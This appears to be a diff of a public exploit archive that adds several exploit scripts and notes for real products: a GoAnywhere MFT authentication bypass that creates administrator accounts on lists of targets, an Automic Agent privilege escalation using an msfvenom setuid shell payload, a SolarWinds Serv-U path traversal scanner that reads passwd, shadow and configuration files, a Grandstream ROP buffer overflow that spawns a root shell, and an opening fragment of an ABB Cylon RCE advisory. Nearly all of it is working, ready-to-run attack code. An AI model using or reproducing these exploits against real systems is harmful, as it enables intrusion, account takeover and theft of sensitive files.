token = auth_arg
cookies = {"PHPSESSID": token}
if not cookies:
sys.exit(-3)
nishka = threading.Thread(target=koj_slusha, args=(listen_ip,))
nishka.daemon = True
nishka.start()
bacname = f"http://{target_ip}/getApplicationNamesJS.php"
r = requests.get(bacname)
if r.status_code == 200:
try:
r = r.content
decor = r.decode("utf-8")
except UnicodeDecodeError:
decor = r.decode("utf-8", errors="ignore")
odg = re.search(r"var instanceDirectory=(.*?);", decor)
if odg:
cmd = "echo -ne \"[o] \" ; cat runtime/release.properties | grep -w 'runtime.ver'"
print("[o] Building name:", odg.group(1))
kacuj(target_ip, listen_ip, cmd, token=None, cookies=cookies)
print("\033[92m[+] -> [virtual] rootshell\033[0m\n")
else:
print("[o] Unknown building name.")
sleep(0.01)
while True:
sleep(0.01)
cmd = input("# ")
if cmd.lower() in ["exit", "quit"]:
print("[o] Removing callback file.")
kacuj(target_ip, listen_ip, "rm /tmp/" + AAM, token=None, cookies=cookies)
print("\033[91m[!] Connection terminated.\033[0m")
os._exit(-17)
kacuj(target_ip, listen_ip, cmd, token=None, cookies=cookies)
nishka.join()
if __name__ == "__main__":
main()

338
exploits/multiple/remote/52308.py Executable file
View file

@ -0,0 +1,338 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Exploit Title: Fortra GoAnywhere MFT 7.4.1 - Authentication Bypass
# Date: 2025-05-25
# Exploit Author: @ibrahimsql
# Exploit Author's github: https://github.com/ibrahimsql
# Vendor Homepage: https://www.fortra.com/products/secure-file-transfer/goanywhere-mft
# Software Link: https://www.fortra.com/products/secure-file-transfer/goanywhere-mft/free-trial
# Version: < 7.4.1
# Tested on: Kali Linux 2024.1
# CVE: CVE-2024-0204
# Description:
# Fortra GoAnywhere MFT versions prior to 7.4.1 contain a critical authentication bypass vulnerability
# that allows unauthenticated attackers to create an administrator account by exploiting a path traversal
# vulnerability to access the initial account setup wizard. This exploit demonstrates two different
# path traversal techniques to maximize successful exploitation across various server configurations.
#
# References:
# - https://old.rapid7.com/blog/post/2024/01/23/etr-cve-2024-0204-critical-authentication-bypass-in-fortra-goanywhere-mft/
# - https://www.tenable.com/blog/cve-2024-0204-fortra-goanywhere-mft-authentication-bypass-vulnerability
# - https://nvd.nist.gov/vuln/detail/cve-2024-0204
import argparse
import concurrent.futures
import os
import socket
import sys
from typing import List, Dict, Tuple, Optional, Union
import requests
from bs4 import BeautifulSoup
from colorama import Fore, Style, init
# Initialize colorama for cross-platform colored output
init(autoreset=True)
# Disable SSL warnings
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
# Constants
DEFAULT_TIMEOUT = 10
MAX_THREADS = 10
USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
PRIMARY_EXPLOIT_PATH = "/goanywhere/images/..;/wizard/InitialAccountSetup.xhtml"
SECONDARY_EXPLOIT_PATH = "/goanywhere/..;/wizard/InitialAccountSetup.xhtml"
class Banner:
@staticmethod
def show():
banner = f"""{Fore.CYAN}
{Style.RESET_ALL}
{Fore.GREEN}CVE-2024-0204 Exploit v1.0{Fore.YELLOW} | {Fore.CYAN} Developer @ibrahimsql{Style.RESET_ALL}
"""
print(banner)
class GoAnywhereExploit:
def __init__(self, username: str, password: str, timeout: int = DEFAULT_TIMEOUT):
self.username = username
self.password = password
self.timeout = timeout
self.headers = {"User-Agent": USER_AGENT}
self.vulnerable_targets = []
self.non_vulnerable_targets = []
self.error_targets = []
def check_target(self, target: str) -> Dict:
"""
Check if target is vulnerable to CVE-2024-0204 and attempt to create an admin account
Args:
target: The target URL/domain to check
Returns:
Dict containing result information
"""
result = {
"target": target,
"vulnerable": False,
"message": "",
"admin_created": False,
"error": None
}
# Try primary exploit path first
primary_result = self._try_exploit_path(target, PRIMARY_EXPLOIT_PATH)
if primary_result["vulnerable"]:
return primary_result
# If primary path failed, try secondary exploit path
print(f"{Fore.BLUE}[*] {Style.RESET_ALL}Primary exploit path failed, trying alternative path...")
secondary_result = self._try_exploit_path(target, SECONDARY_EXPLOIT_PATH)
if secondary_result["vulnerable"]:
return secondary_result
# If both paths failed, target is not vulnerable
print(f"{Fore.RED}[-] {Style.RESET_ALL}{target} - Not vulnerable to CVE-2024-0204")
result["message"] = "Not vulnerable to CVE-2024-0204"
self.non_vulnerable_targets.append(target)
return result
def _try_exploit_path(self, target: str, exploit_path: str) -> Dict:
"""
Try to exploit the target using a specific exploit path
Args:
target: Target to exploit
exploit_path: Path to use for exploitation
Returns:
Dict with exploitation results
"""
result = {
"target": target,
"vulnerable": False,
"message": "",
"admin_created": False,
"error": None
}
try:
url = f"https://{target}{exploit_path}"
session = requests.Session()
# Initial check for vulnerability
response = session.get(
url,
headers=self.headers,
verify=False,
timeout=self.timeout
)
# Determine if target is vulnerable based on response
if response.status_code == 401:
print(f"{Fore.RED}[-] {Style.RESET_ALL}{target} - Not vulnerable via {exploit_path} (401 Unauthorized)")
result["message"] = "Not vulnerable (401 Unauthorized)"
return result
if response.status_code != 200:
print(f"{Fore.YELLOW}[?] {Style.RESET_ALL}{target} - Unexpected response via {exploit_path} (Status: {response.status_code})")
result["message"] = f"Unexpected response (Status: {response.status_code})"
return result
# Target is potentially vulnerable
print(f"{Fore.GREEN}[+] {Style.RESET_ALL}{target} - Potentially vulnerable via {exploit_path}!")
result["vulnerable"] = True
self.vulnerable_targets.append(target)
# Extract ViewState token for the form submission
try:
soup = BeautifulSoup(response.text, "html.parser")
view_state = soup.find('input', {'name': 'javax.faces.ViewState'})
if not view_state or not view_state.get('value'):
print(f"{Fore.YELLOW}[!] {Style.RESET_ALL}{target} - Could not extract ViewState token via {exploit_path}")
result["message"] = "Could not extract ViewState token"
return result
# Prepare data for admin account creation
data = {
"j_id_u:creteAdminGrid:username": self.username,
"j_id_u:creteAdminGrid:password_hinput": self.password,
"j_id_u:creteAdminGrid:password": "%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2",
"j_id_u:creteAdminGrid:confirmPassword_hinput": self.password,
"j_id_u:creteAdminGrid:confirmPassword": "%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2",
"j_id_u:creteAdminGrid:submitButton": "",
"createAdminForm_SUBMIT": 1,
"javax.faces.ViewState": view_state['value']
}
# Attempt to create admin account
create_response = session.post(
url,
headers=self.headers,
data=data,
verify=False,
timeout=self.timeout
)
if create_response.status_code == 200:
print(f"{Fore.GREEN}[+] {Style.RESET_ALL}{target} - Admin account created successfully via {exploit_path}! Username: {self.username}, Password: {self.password}")
result["admin_created"] = True
result["message"] = f"Admin account created successfully! Username: {self.username}, Password: {self.password}"
else:
print(f"{Fore.RED}[-] {Style.RESET_ALL}{target} - Failed to create admin account via {exploit_path} (Status: {create_response.status_code})")
result["message"] = f"Failed to create admin account (Status: {create_response.status_code})"
except Exception as e:
print(f"{Fore.RED}[!] {Style.RESET_ALL}{target} - Error extracting form data: {str(e)}")
result["message"] = f"Error extracting form data: {str(e)}"
result["error"] = str(e)
except requests.exceptions.ConnectTimeout:
print(f"{Fore.YELLOW}[!] {Style.RESET_ALL}{target} - Connection timeout")
result["message"] = "Connection timeout"
result["error"] = "Connection timeout"
self.error_targets.append(target)
except requests.exceptions.ConnectionError:
print(f"{Fore.YELLOW}[!] {Style.RESET_ALL}{target} - Connection error")
result["message"] = "Connection error"
result["error"] = "Connection error"
self.error_targets.append(target)
except Exception as e:
print(f"{Fore.RED}[!] {Style.RESET_ALL}{target} - Error: {str(e)}")
result["message"] = f"Error: {str(e)}"
result["error"] = str(e)
self.error_targets.append(target)
return result
def scan_targets(self, targets: List[str]) -> None:
"""
Scan multiple targets concurrently
Args:
targets: List of targets to scan
"""
with concurrent.futures.ThreadPoolExecutor(max_workers=MAX_THREADS) as executor:
executor.map(self.check_target, targets)
def load_targets_from_file(self, file_path: str) -> List[str]:
"""
Load targets from a file
Args:
file_path: Path to the file containing targets
Returns:
List of targets
"""
if not os.path.exists(file_path):
print(f"{Fore.RED}[!] {Style.RESET_ALL}File not found: {file_path}")
return []
try:
with open(file_path, "r") as f:
return [line.strip() for line in f if line.strip()]
except Exception as e:
print(f"{Fore.RED}[!] {Style.RESET_ALL}Error reading file: {str(e)}")
return []
def print_summary(self) -> None:
"""Print a summary of the scanning results"""
print(f"\n{Fore.CYAN}[*] {Style.RESET_ALL}Scan Summary:")
print(f"{Fore.GREEN}[+] {Style.RESET_ALL}Vulnerable targets: {len(self.vulnerable_targets)}")
print(f"{Fore.RED}[-] {Style.RESET_ALL}Non-vulnerable targets: {len(self.non_vulnerable_targets)}")
print(f"{Fore.YELLOW}[!] {Style.RESET_ALL}Error targets: {len(self.error_targets)}")
if self.vulnerable_targets:
print(f"\n{Fore.GREEN}[+] {Style.RESET_ALL}Vulnerable targets:")
for target in self.vulnerable_targets:
print(f" - {target}")
def validate_args(args):
"""Validate command line arguments"""
if not args.target and not args.file:
print(f"{Fore.RED}[!] {Style.RESET_ALL}Error: You must specify either a target (-t) or a file (-f)")
return False
if args.file and not os.path.exists(args.file):
print(f"{Fore.RED}[!] {Style.RESET_ALL}Error: File not found: {args.file}")
return False
if not args.username or not args.password:
print(f"{Fore.RED}[!] {Style.RESET_ALL}Error: You must specify both username (-u) and password (-p)")
return False
return True
def main():
"""Main function"""
parser = argparse.ArgumentParser(description="CVE-2024-0204: Fortra GoAnywhere MFT Authentication Bypass Exploit")
parser.add_argument('-t', '--target', help="Target host to check (e.g., 'example.com' or '192.168.1.1')")
parser.add_argument('-f', '--file', help="File containing targets, one per line")
parser.add_argument('-u', '--username', help="Username for the admin account to create")
parser.add_argument('-p', '--password', help="Password for the admin account to create")
parser.add_argument('--timeout', type=int, default=DEFAULT_TIMEOUT, help=f"Connection timeout in seconds (default: {DEFAULT_TIMEOUT})")
parser.add_argument('--threads', type=int, default=MAX_THREADS, help=f"Number of concurrent threads for scanning (default: {MAX_THREADS})")
args = parser.parse_args()
# Show banner
Banner.show()
# Validate arguments
if not validate_args(args):
parser.print_help()
sys.exit(1)
# Initialize exploit
exploit = GoAnywhereExploit(
username=args.username,
password=args.password,
timeout=args.timeout
)
# Handle single target
if args.target:
print(f"{Fore.CYAN}[*] {Style.RESET_ALL}Checking single target: {args.target}")
exploit.check_target(args.target)
# Handle targets from file
elif args.file:
targets = exploit.load_targets_from_file(args.file)
if not targets:
print(f"{Fore.RED}[!] {Style.RESET_ALL}No valid targets found in the file")
sys.exit(1)
print(f"{Fore.CYAN}[*] {Style.RESET_ALL}Loaded {len(targets)} targets from file")
print(f"{Fore.CYAN}[*] {Style.RESET_ALL}Starting scan with {args.threads} threads...\n")
exploit.scan_targets(targets)
# Print summary
exploit.print_summary()
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
print(f"\n{Fore.YELLOW}[!] {Style.RESET_ALL}Scan interrupted by user")
sys.exit(0)
except Exception as e:
print(f"{Fore.RED}[!] {Style.RESET_ALL}Unhandled error: {str(e)}")
sys.exit(1)

13
exploits/multiple/remote/52309.txt Normal file
View file

@ -0,0 +1,13 @@
# Exploit Title: Automic Agent 24.3.0 HF4 - Privilege Escalation
# Date: 26.05.2025
# Exploit Author: Flora Schäfer
# Vendor Homepage: https://www.broadcom.com/products/software/automation/automic-automation
# Version: <24.3.0 HF4, <21.0.13 HF1
# Tested on: Linux
# CVE : CVE-2025-4971
1. Generate shared object file using msfvenom
$ msfvenom -p linux/x64/exec PrependSetuid=True PrependSetguid=True CMD="/bin/sh" -f elf-so > /tmp/sh.so
2. Run the ucxjlx6 executable as follows
$ ./ucxjlx6 ini=<(echo -e "[GLOBAL]\nhelplib = /dev/null\nsystem = blep\n[MISC]\nauthentication = PAM\n[PAM]\nlibName = /tmp/sh.so\n[VARIABLES]\nUC_EX_JOB_MD=blep")

408
exploits/multiple/remote/52311.py Executable file
View file

@ -0,0 +1,408 @@
# Exploit Title: SolarWinds Serv-U 15.4.2 HF1 - Directory Traversal
# Date: 2025-05-28
# Exploit Author: @ibrahimsql
# Exploit Author's github: https://github.com/ibrahimsql
# Vendor Homepage: https://www.solarwinds.com/serv-u-managed-file-transfer-server
# Software Link: https://www.solarwinds.com/serv-u-managed-file-transfer-server/registration
# Version: <= 15.4.2 HF1
# Tested on: Kali Linux 2024.1
# CVE: CVE-2024-28995
# Description:
# SolarWinds Serv-U was susceptible to a directory traversal vulnerability that would allow
# attackers to read sensitive files on the host machine. This exploit demonstrates multiple
# path traversal techniques to access Serv-U log files and other system files on both
# Windows and Linux systems.
#
# References:
# - https://nvd.nist.gov/vuln/detail/cve-2024-28995
# - https://www.rapid7.com/blog/post/2024/06/11/etr-cve-2024-28995-trivially-exploitable-information-disclosure-vulnerability-in-solarwinds-serv-u/
# - https://thehackernews.com/2024/06/solarwinds-serv-u-vulnerability-under.html
# Requirements: urllib3>=1.26.0 , colorama>=0.4.4 , requests>=2.25.0
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import argparse
import concurrent.futures
import json
import os
import re
import sys
import time
from concurrent.futures import ThreadPoolExecutor, as_completed
from urllib.parse import urlparse
import requests
from colorama import Fore, Back, Style, init
# Initialize colorama
init(autoreset=True)
# Disable SSL warnings
try:
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
except ImportError:
pass
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
BANNER = rf'''
{Fore.CYAN}
______ _______ ____ ___ ____ _ _ ____ ___ ___ ___ ____
/ ___\ \ / / ____| |___ \ / _ \___ \| || | |___ \( _ )/ _ \ / _ \| ___|
| | \ \ / /| _| _____ __) | | | |__) | || |_ _____ __) / _ \ (_) | (_) |___ \
| |___ \ V / | |__|_____/ __/| |_| / __/|__ _|_____/ __/ (_) \__, |\__, |___) |
\____| \_/ |_____| |_____|\___/_____| |_| |_____\___/ /_/ /_/|____/
{Fore.YELLOW}
SolarWinds Serv-U Directory Traversal Exploit
{Fore.RED} CVE-2024-28995 by @ibrahimsql
{Style.RESET_ALL}
'''
class ScanResult:
def __init__(self, url, is_vulnerable=False, version=None, os_type=None, file_content=None, path=None):
self.url = url
self.is_vulnerable = is_vulnerable
self.version = version
self.os_type = os_type
self.file_content = file_content
self.path = path
self.timestamp = time.strftime("%Y-%m-%d %H:%M:%S")
def to_dict(self):
return {
"url": self.url,
"is_vulnerable": self.is_vulnerable,
"version": self.version,
"os_type": self.os_type,
"path": self.path,
"timestamp": self.timestamp
}
def print_banner():
print(BANNER)
def normalize_url(url):
"""Normalize URL to ensure it has http/https protocol."""
if not url.startswith('http'):
url = f"https://{url}"
return url.rstrip('/')
def extract_server_version(headers):
"""Extract Serv-U version from server headers if available."""
if 'Server' in headers:
server_header = headers['Server']
# Look for Serv-U version pattern
match = re.search(r'Serv-U/(\d+\.\d+\.\d+)', server_header)
if match:
return match.group(1)
return None
def is_vulnerable_version(version):
"""Check if the detected version is vulnerable (15.4.2 HF1 or lower)."""
if not version:
return None
try:
# Split version numbers
major, minor, patch = map(int, version.split('.'))
# Vulnerable if lower than 15.4.2 HF2
if major < 15:
return True
elif major == 15:
if minor < 4:
return True
elif minor == 4:
if patch <= 2: # We're assuming patch 2 is 15.4.2 HF1 which is vulnerable
return True
except:
pass
return False
def get_request(url, timeout=15):
"""Make a GET request to the specified URL."""
try:
response = requests.get(url, verify=False, timeout=timeout, allow_redirects=False)
return response
except requests.RequestException as e:
return None
def detect_os_type(content):
"""Detect the operating system type from the file content."""
if any(indicator in content for indicator in ["root:", "bin:x:", "daemon:", "/etc/", "/home/", "/var/"]):
return "Linux"
elif any(indicator in content for indicator in ["[fonts]", "[extensions]", "[Mail]", "Windows", "ProgramData", "Program Files"]):
return "Windows"
return None
def get_default_payloads():
"""Return a list of directory traversal payloads specific to CVE-2024-28995."""
return [
# Windows payloads - Serv-U specific files
{"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-StartupLog.txt", "name": "Serv-U Startup Log"},
{"path": "/?InternalDir=/../../../../ProgramData/RhinoSoft/Serv-U/^&InternalFile=Serv-U-StartupLog.txt", "name": "Serv-U Startup Log Alt"},
{"path": "/?InternalDir=\\..\\..\\..\\..\\ProgramData\\RhinoSoft\\Serv-U\\&InternalFile=Serv-U-StartupLog.txt", "name": "Serv-U Startup Log Alt2"},
{"path": "/?InternalDir=../../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-StartupLog.txt", "name": "Serv-U Startup Log Alt3"},
{"path": "/?InternalDir=../../../../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-StartupLog.txt", "name": "Serv-U Startup Log Deep"},
{"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=ServUStartupLog.txt", "name": "Serv-U Startup Log Alt4"},
{"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U.Log", "name": "Serv-U Log"},
{"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=ServULog.txt", "name": "Serv-U Log Alt"},
{"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=ServUErrorLog.txt", "name": "Serv-U Error Log"},
{"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-ErrorLog.txt", "name": "Serv-U Error Log Alt"},
{"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U.ini", "name": "Serv-U Config"},
{"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=ServUAdmin.ini", "name": "Serv-U Admin Config"},
{"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/Users/&InternalFile=Users.txt", "name": "Serv-U Users"},
{"path": "/?InternalDir=/./../../../ProgramData/RhinoSoft/Serv-U/Users/&InternalFile=UserAccounts.txt", "name": "Serv-U User Accounts"},
# Verify Windows with various system files
{"path": "/?InternalDir=/../../../../windows&InternalFile=win.ini", "name": "Windows ini"},
{"path": "/?InternalDir=\\..\\..\\..\\..\\windows&InternalFile=win.ini", "name": "Windows ini Alt"},
{"path": "/?InternalDir=../../../../windows&InternalFile=win.ini", "name": "Windows ini Alt2"},
{"path": "/?InternalDir=../../../../../../windows&InternalFile=win.ini", "name": "Windows ini Deep"},
{"path": "/?InternalDir=/./../../../Windows/system.ini", "name": "Windows system.ini"},
{"path": "/?InternalDir=/./../../../Windows/System32/&InternalFile=drivers.ini", "name": "Windows drivers.ini"},
{"path": "/?InternalDir=/./../../../Windows/System32/drivers/etc/&InternalFile=hosts", "name": "Windows hosts"},
{"path": "/?InternalDir=/./../../../Windows/System32/&InternalFile=config.nt", "name": "Windows config.nt"},
{"path": "/?InternalDir=/./../../../Windows/System32/&InternalFile=ntuser.dat", "name": "Windows ntuser.dat"},
{"path": "/?InternalDir=/./../../../Windows/boot.ini", "name": "Windows boot.ini"},
# Verify Linux with various system files
{"path": "/?InternalDir=\\..\\..\\..\\..\\etc&InternalFile=passwd", "name": "Linux passwd"},
{"path": "/?InternalDir=/../../../../etc^&InternalFile=passwd", "name": "Linux passwd Alt"},
{"path": "/?InternalDir=\\..\\..\\..\\..\\etc/passwd", "name": "Linux passwd Alt2"},
{"path": "/?InternalDir=../../../../etc&InternalFile=passwd", "name": "Linux passwd Alt3"},
{"path": "/?InternalDir=../../../../../../etc&InternalFile=passwd", "name": "Linux passwd Deep"},
{"path": "/?InternalDir=/./../../../etc/&InternalFile=shadow", "name": "Linux shadow"},
{"path": "/?InternalDir=/./../../../etc/&InternalFile=hosts", "name": "Linux hosts"},
{"path": "/?InternalDir=/./../../../etc/&InternalFile=hostname", "name": "Linux hostname"},
{"path": "/?InternalDir=/./../../../etc/&InternalFile=issue", "name": "Linux issue"},
{"path": "/?InternalDir=/./../../../etc/&InternalFile=os-release", "name": "Linux os-release"}
]
def create_custom_payload(directory, filename):
"""Create a custom payload with the specified directory and filename."""
# Try both encoding styles
payloads = [
{"path": f"/?InternalDir=/./../../../{directory}&InternalFile={filename}", "name": f"Custom {filename}"},
{"path": f"/?InternalDir=/../../../../{directory}^&InternalFile={filename}", "name": f"Custom {filename} Alt"},
{"path": f"/?InternalDir=\\..\\..\\..\\..\\{directory}&InternalFile={filename}", "name": f"Custom {filename} Alt2"}
]
return payloads
def load_wordlist(wordlist_path):
"""Load custom paths from a wordlist file."""
payloads = []
try:
with open(wordlist_path, 'r') as f:
for line in f:
line = line.strip()
if line and not line.startswith('#'):
# Check if the line contains a directory and file separated by a delimiter
if ':' in line:
directory, filename = line.split(':', 1)
payloads.extend(create_custom_payload(directory, filename))
else:
# Assume it's a complete path
payloads.append({"path": line, "name": f"Wordlist: {line[:20]}..."})
return payloads
except Exception as e:
print(f"{Fore.RED}[!] Error loading wordlist: {e}{Style.RESET_ALL}")
return []
def scan_target(url, custom_payloads=None):
"""Scan a target URL for the CVE-2024-28995 vulnerability."""
url = normalize_url(url)
result = ScanResult(url)
# Try to get server version first
try:
response = get_request(url)
if response and response.headers:
result.version = extract_server_version(response.headers)
vulnerable_version = is_vulnerable_version(result.version)
if vulnerable_version is False:
print(f"{Fore.YELLOW}[*] {url} - Serv-U version {result.version} appears to be patched{Style.RESET_ALL}")
# Still continue scanning as version detection may not be reliable
except Exception as e:
pass
# Get all payloads to try
payloads = get_default_payloads()
if custom_payloads:
payloads.extend(custom_payloads)
# Try each payload
for payload in payloads:
full_url = f"{url}{payload['path']}"
try:
print(f"{Fore.BLUE}[*] Trying: {payload['name']} on {url}{Style.RESET_ALL}")
response = get_request(full_url)
if response and response.status_code == 200:
content = response.text
# Check if the response contains meaningful content
if len(content) > 100: # Arbitrary threshold to filter out error pages
os_type = detect_os_type(content)
if os_type:
result.is_vulnerable = True
result.os_type = os_type
result.file_content = content
result.path = payload['path']
print(f"{Fore.GREEN}[+] {Fore.RED}VULNERABLE: {url} - {payload['name']} - Detected {os_type} system{Style.RESET_ALL}")
# Successful match - no need to try more payloads
return result
except Exception as e:
continue
if not result.is_vulnerable:
print(f"{Fore.RED}[-] Not vulnerable: {url}{Style.RESET_ALL}")
return result
def scan_multiple_targets(targets, custom_dir=None, custom_file=None, wordlist=None):
"""Scan multiple targets using thread pool."""
results = []
custom_payloads = []
# Add custom payloads if specified
if custom_dir and custom_file:
custom_payloads.extend(create_custom_payload(custom_dir, custom_file))
# Add wordlist payloads if specified
if wordlist:
custom_payloads.extend(load_wordlist(wordlist))
print(f"{Fore.CYAN}[*] Starting scan of {len(targets)} targets with {len(custom_payloads) + len(get_default_payloads())} payloads{Style.RESET_ALL}")
# Use fixed thread count of 10
with ThreadPoolExecutor(max_workers=10) as executor:
future_to_url = {executor.submit(scan_target, target, custom_payloads): target for target in targets}
for future in as_completed(future_to_url):
try:
result = future.result()
results.append(result)
except Exception as e:
print(f"{Fore.RED}[!] Error scanning {future_to_url[future]}: {e}{Style.RESET_ALL}")
return results
def save_results(results, output_file):
"""Save scan results to a JSON file."""
output_data = [result.to_dict() for result in results]
try:
with open(output_file, 'w') as f:
json.dump(output_data, f, indent=2)
print(f"{Fore.GREEN}[+] Results saved to {output_file}{Style.RESET_ALL}")
except Exception as e:
print(f"{Fore.RED}[!] Error saving results: {e}{Style.RESET_ALL}")
def save_vulnerable_content(result, output_dir):
"""Save the vulnerable file content to a file."""
if not os.path.exists(output_dir):
os.makedirs(output_dir)
# Create a safe filename from the URL
parsed_url = urlparse(result.url)
safe_filename = f"{parsed_url.netloc.replace(':', '_')}.txt"
output_path = os.path.join(output_dir, safe_filename)
try:
with open(output_path, 'w') as f:
f.write(f"URL: {result.url}\n")
f.write(f"Path: {result.path}\n")
f.write(f"Version: {result.version or 'Unknown'}\n")
f.write(f"OS Type: {result.os_type or 'Unknown'}\n")
f.write(f"Timestamp: {result.timestamp}\n")
f.write("\n--- File Content ---\n")
f.write(result.file_content)
print(f"{Fore.GREEN}[+] Saved vulnerable content to {output_path}{Style.RESET_ALL}")
except Exception as e:
print(f"{Fore.RED}[!] Error saving content: {e}{Style.RESET_ALL}")
def main():
parser = argparse.ArgumentParser(description="CVE-2024-28995 - SolarWinds Serv-U Directory Traversal Scanner")
parser.add_argument("-u", "--url", help="Target URL")
parser.add_argument("-f", "--file", help="File containing a list of URLs to scan")
parser.add_argument("-d", "--dir", help="Custom directory path to read (e.g., ProgramData/RhinoSoft/Serv-U/)")
parser.add_argument("-n", "--filename", help="Custom filename to read (e.g., Serv-U-StartupLog.txt)")
parser.add_argument("-w", "--wordlist", help="Path to wordlist containing custom paths to try")
parser.add_argument("-o", "--output", help="Output JSON file to save results")
args = parser.parse_args()
print_banner()
# Validate arguments
if not args.url and not args.file:
parser.print_help()
print(f"\n{Fore.RED}[!] Error: Either -u/--url or -f/--file is required{Style.RESET_ALL}")
sys.exit(1)
targets = []
# Get targets
if args.url:
targets.append(args.url)
if args.file:
try:
with open(args.file, "r") as f:
targets.extend([line.strip() for line in f.readlines() if line.strip()])
except Exception as e:
print(f"{Fore.RED}[!] Error reading file {args.file}: {e}{Style.RESET_ALL}")
sys.exit(1)
# Deduplicate targets
targets = list(set(targets))
if not targets:
print(f"{Fore.RED}[!] No valid targets provided.{Style.RESET_ALL}")
sys.exit(1)
print(f"{Fore.CYAN}[*] Loaded {len(targets)} target(s){Style.RESET_ALL}")
# Set output file
output_file = args.output or f"cve_2024_28995_results_{time.strftime('%Y%m%d_%H%M%S')}.json"
# Start scanning
results = scan_multiple_targets(targets, args.dir, args.filename, args.wordlist)
# Process results
vulnerable_count = sum(1 for result in results if result.is_vulnerable)
print(f"\n{Fore.CYAN}[*] Scan Summary:{Style.RESET_ALL}")
print(f"{Fore.CYAN}[*] Total targets: {len(results)}{Style.RESET_ALL}")
print(f"{Fore.GREEN if vulnerable_count > 0 else Fore.RED}[*] Vulnerable targets: {vulnerable_count}{Style.RESET_ALL}")
# Save results
save_results(results, output_file)
# Save vulnerable file contents
for result in results:
if result.is_vulnerable and result.file_content:
save_vulnerable_content(result, "vulnerable_files")
print(f"\n{Fore.GREEN}[+] Scan completed successfully!{Style.RESET_ALL}")
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
print(f"\n{Fore.YELLOW}[!] Scan interrupted by user{Style.RESET_ALL}")
sys.exit(0)
except Exception as e:
print(f"\n{Fore.RED}[!] An error occurred: {e}{Style.RESET_ALL}")
sys.exit(1)

110
exploits/multiple/remote/52313.py Executable file
View file

@ -0,0 +1,110 @@
#!/usr/bin/env python3
# Exploit Title: Grandstream GSD3710 1.0.11.13 - Stack Overflow
# Date: 2025-05-29
# Exploit Author: Pepelux
# Vendor Homepage: https://www.grandstream.com/
# Version: Grandstream GSD3710 - firmware:1.0.11.13 and lower
# Tested on: Linux and MacOS
# CVE: CVE-2022-2025
"""
Author: Jose Luis Verdeguer (@pepeluxx)
Required: Pwntools
Example:
$ python 3 CVE-2022-2025.py -i DEVICE_IP -u USER -p PASSWORD
"""
from struct import pack
import sys
from time import sleep
import argparse
from pwn import *
def get_args():
parser = argparse.ArgumentParser(
formatter_class=lambda prog: argparse.RawDescriptionHelpFormatter(
prog, max_help_position=50))
# Add arguments
parser.add_argument('-i', '--ip', type=str, required=True,
help='device IP address', dest="ip")
parser.add_argument('-u', '--user', type=str, required=True,
help='username', dest="user")
parser.add_argument('-p', '--pass', type=str, required=True,
help='password', dest="pwd")
# Array for all arguments passed to script
args = parser.parse_args()
try:
ip = args.ip
user = args.user
pwd = args.pwd
return ip, user, pwd
except ValueError:
exit()
def check_badchars(payload):
for i in range(5, len(payload)):
if payload[i] in [0xd, 0xa, 0x3b, 0x7c, 0x20]:
log.warn("Badchar %s detected at %#x" % (hex(payload[i]), i))
return True
return False
def main():
ip, user, pwd = get_args()
libc_base = 0x76bb8000
gadget = libc_base + 0x5952C # 0x0005952c: pop {r0, r4, pc};
bin_sh = libc_base + 0xCEA9C # /bin/sh
system = libc_base + 0x2C7FD # 0x0002c7fd # system@libc
exit = libc_base + 0x2660C
print("[*] Libc base: %#x" % libc_base)
print("[*] ROP gadget: %#x" % gadget)
print("[*] /bin/sh: %#x" % bin_sh)
print("[*] system: %#x" % system)
print("[*] exit: %#x\n" % exit)
padding = b"A" * 320
payload = b'ping '
payload += padding
payload += p32(gadget)
payload += p32(bin_sh)
payload += b"AAAA"
payload += p32(system)
payload += p32(exit)
if check_badchars(payload):
sys.exit(0)
count = 1
while True:
print('Try: %d' % count)
s = ssh(user, ip, 22, pwd)
p = s.shell(tty=False)
print(p.readuntil(b"GDS3710> "))
p.sendline(payload)
p.sendline(b"id")
sleep(1)
data = p.read()
if str(data).find('root') > -1:
print('PWNED!')
p.interactive()
s.close()
sys.exit()
s.close()
count += 1
if __name__ == '__main__':
main()

97
exploits/multiple/remote/52317.txt Normal file
View file

@ -0,0 +1,97 @@
ABB Cylon Aspect 3.08.04 DeploySource - Remote Code Execution (RCE)
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.04
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: ABB Cylon Aspect BMS/BAS is vulnerable to a critical flaw in the
AuthenticatedHttpServlet within its application server, enabling
remote attackers to bypass authentication by setting the Host:
127.0.0.1 header. This deceives the server into processing requests
as if they originate from localhost, granting unauthorized access
to privileged operations. This bypass grants access to privileged
functionality, including the DeploymentServlet, which is vulnerable
to directory traversal. By leveraging this, an attacker can write
